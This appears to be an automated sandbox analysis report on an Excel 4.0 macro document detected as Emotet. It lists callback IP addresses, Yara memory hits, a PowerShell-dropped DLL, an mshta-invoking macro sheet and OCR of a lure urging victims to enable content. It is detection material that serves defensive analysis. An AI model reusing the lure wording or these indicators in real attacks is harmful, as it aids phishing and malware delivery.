                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 160.16.102.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 160.16.102.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 160.16.102.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 160.16.102.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 160.16.102.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 160.16.102.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 160.16.102.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 160.16.102.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 160.16.102.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 160.16.102.168
                            Source: mshta.exe, 00000004.00000002.435343399.0000000003C64000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.com\<4& equals www.linkedin.com (Linkedin)
                            Source: mshta.exe, 00000004.00000002.435343399.0000000003C64000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
                            Source: rundll32.exe, 0000000F.00000002.673192959.00000000005E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1001B43F GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1001B43F GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,
                            Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASS

                            E-Banking Fraud

                            barindex
                            Yara detected Emotet
                            Source: Yara matchFile source: 13.2.rundll32.exe.3b0000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.620000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.27b0000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2630000.12.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2830000.16.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2820000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.28a0000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.340000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2420000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.340000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.4a0000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2d30000.20.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.280000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2c80000.18.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.330000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.ac0000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.bd0000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.3020000.27.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2820000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2ef0000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2f40000.24.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2f70000.25.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2ec0000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.400000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2e00000.21.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2420000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2700000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2f60000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2f70000.25.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.4a0000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2fc0000.14.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.620000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.430000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2e90000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.27d0000.14.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2830000.16.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2fc0000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2e80000.22.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.27b0000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.3080000.29.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.25b0000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2630000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.280000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2820000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2430000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.7f0000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2d00000.19.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.20f0000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.350000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.7f0000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2660000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.270000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.bd0000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2f10000.23.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.820000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2c80000.18.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2400000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2e00000.21.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2eb0000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2fa0000.26.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.3050000.28.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2e90000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2ec0000.11.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2f60000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2400000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2740000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.ba0000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2e60000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2d30000.20.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.430000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2860000.17.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.28a0000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2f10000.23.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2700000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.ac0000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.3020000.27.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2f60000.12.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.27d0000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.610000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.3100000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2c0000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2780000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2800000.15.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.10000000.30.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.3030000.15.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.460000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.10000000.16.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.672072251.0000000000200000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.541554027.00000000001C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.672636811.0000000000430000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.578707809.0000000002821000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.542046828.0000000002820000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.541660738.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.672779840.0000000000461000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673803269.0000000002801000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.542478575.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.541724844.0000000000821000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.542228436.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.674180199.0000000002E81000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.541516961.0000000000190000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.674124482.0000000002E00000.00000040.00000010.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.541940450.0000000002741000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.578772331.00000000028A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.672599547.0000000000401000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.578889173.0000000002EB1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673644143.0000000002630000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.674231548.0000000002F10000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.579012623.0000000003101000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.578238624.00000000003B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.542432486.0000000003031000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673769200.00000000027D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.672141355.0000000000271000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.578430206.0000000002431000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.542188675.0000000002E61000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.578354929.00000000020F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.542349142.0000000002F61000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673878753.0000000002861000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673392642.0000000000BA1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.674347408.0000000002FA1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.544093130.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673698904.0000000002661000.00000020.00000010.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.578582490.0000000002781000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673289454.0000000000611000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.580707170.00000000001F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.541608095.0000000000280000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.544152494.0000000000351000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.541890184.0000000002420000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.674038716.0000000002D01000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.578396219.0000000002400000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.672197445.0000000000340000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673986023.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.674276133.0000000002F41000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.578626401.00000000027B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.494656303.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.542388778.0000000002FC0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.578293718.0000000000620000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673600434.00000000025B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.674675365.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.542302044.0000000002EF1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.672985189.00000000004A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.674444263.0000000003051000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.578111273.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.578532434.0000000002700000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.674481357.0000000003081000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.541702376.00000000007F0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673330806.0000000000AC0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.674312422.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.674404496.0000000003020000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.674070435.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.542264283.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673440087.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.544337274.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.580607139.0000000000180000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673835028.0000000002830000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.581940657.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.579044435.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.578950230.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\ProgramData\JooSee.dll, type: DROPPED

                            System Summary

                            barindex
                            Found malicious Excel 4.0 Macro
                            Source: imedpub_6.xlsMacro extractor: Sheet: REEEEEEEE contains: mshta
                            Source: imedpub_6.xlsMacro extractor: Sheet: REEEEEEEE contains: mshta
                            Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
                            Source: Screenshot number: 4Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 21 22 C
                            Source: Screenshot number: 4Screenshot OCR: DOCUMENT IS PROTECTED. 10 11 12 13 Previewing is not available for protected documents. 14 15
                            Source: Screenshot number: 4Screenshot OCR: protected documents. 14 15 You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to pre
                            Source: Screenshot number: 4Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 21 22 Ci [.I 23 24 25 26
                            Source: Document image extraction number: 0Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                            Source: Document image extraction number: 0Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                            Source: Document image extraction number: 0Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                            Source: Document image extraction number: 0Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                            Source: Document image extraction number: 1Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                            Source: Document image extraction number: 1Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                            Source: Document image extraction number: 1Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                            Source: Document image extraction number: 1Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                            Document contains OLE streams with names of living off the land binaries
                            Source: imedpub_6.xlsStream path 'Workbook' : ........ZO..........................\.p....xXx B.....a.........=...........................................=........p.08.......X.@...........".......................1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1.*.h...6........<..C.a.l.i.b.r.i. .L.i.g.h.t.1...,...6........<..C.a.l.i.b.r.i.1.......6........<..C.a.l.i.b.r.i.1.......6........<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1.......<........<..C.a.l.i.b.r.i.1.......>........<..C.a.l.i.b.r.i.1.......?........<..C.a.l.i.b.r.i.1.......4........<..C.a.l.i.b.r.i.1.......4........<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..A.r.i.a.l...3......#.,.#.#.0.\. .".. ".;.\.-.#.,.#.#.0.\. .".. "...=......#.,.#.#.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0.\. .".. "...?......#.,.#.#.0...0.0.\. .".. ".;.\.-.#.,.#.#.0...0.0.\. .".. "...I..."..#.,.#.#.0...0.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0...0.0.\. .".. "...q.*.6.._.-.*. .#.,.#.#.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0.\. .".. "._.-.;._.-.*. .".-.".\. .".. "._.-.;._.-.@._.-...,.).'.._-* #,##0_-;\-* #,##0_-;_-* "-"_-;_-@_-....,.>.._.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;._.-.*. .".-.".?.?.\. .".. "._.-.;._.-.@._.-...4.+./.._-* #,##0.00_-;\-* #,##0.00_-;_-* "-"??_-;_-@_-..?...:.._("$"* #,##0.00_);_("$"* \(#,##0.00\);_("$"* "-"??_);_(@_).......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ...ff....... ......+... ............ ......)... ............ ......,... ............ ......*... ............ .......... ............ .......... ............ .......... ............ .......... ....P....... .......... ....P....... .......
                            Source: imedpub_6.xls.0.drStream path 'Workbook' : ........ZO..........................\.p....user B.....a.........=...........................................=........p.08.......X.@...........".......................1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1.*.h...6........<..C.a.l.i.b.r.i. .L.i.g.h.t.1...,...6........<..C.a.l.i.b.r.i.1.......6........<..C.a.l.i.b.r.i.1.......6........<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1.......<........<..C.a.l.i.b.r.i.1.......>........<..C.a.l.i.b.r.i.1.......?........<..C.a.l.i.b.r.i.1.......4........<..C.a.l.i.b.r.i.1.......4........<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..A.r.i.a.l...3......#.,.#.#.0.\. .".. ".;.\.-.#.,.#.#.0.\. .".. "...=......#.,.#.#.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0.\. .".. "...?......#.,.#.#.0...0.0.\. .".. ".;.\.-.#.,.#.#.0...0.0.\. .".. "...I..."..#.,.#.#.0...0.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0...0.0.\. .".. "...q.*.6.._.-.*. .#.,.#.#.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0.\. .".. "._.-.;._.-.*. .".-.".\. .".. "._.-.;._.-.@._.-...,.).'.._-* #,##0_-;\-* #,##0_-;_-* "-"_-;_-@_-....,.>.._.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;._.-.*. .".-.".?.?.\. .".. "._.-.;._.-.@._.-...4.+./.._-* #,##0.00_-;\-* #,##0.00_-;_-* "-"??_-;_-@_-..?...:.._("$"* #,##0.00_);_("$"* \(#,##0.00\);_("$"* "-"??_);_(@_).......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ...ff....... ......+... ............ ......)... ............ ......,... ............ ......*... ............ .......... ............ .......... ............ .......... ............ .......... ....P....... .......... ....P....... .......
                            Powershell drops PE file
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\JooSee.dllJump to dropped file
                            Found Excel 4.0 Macro with suspicious formulas
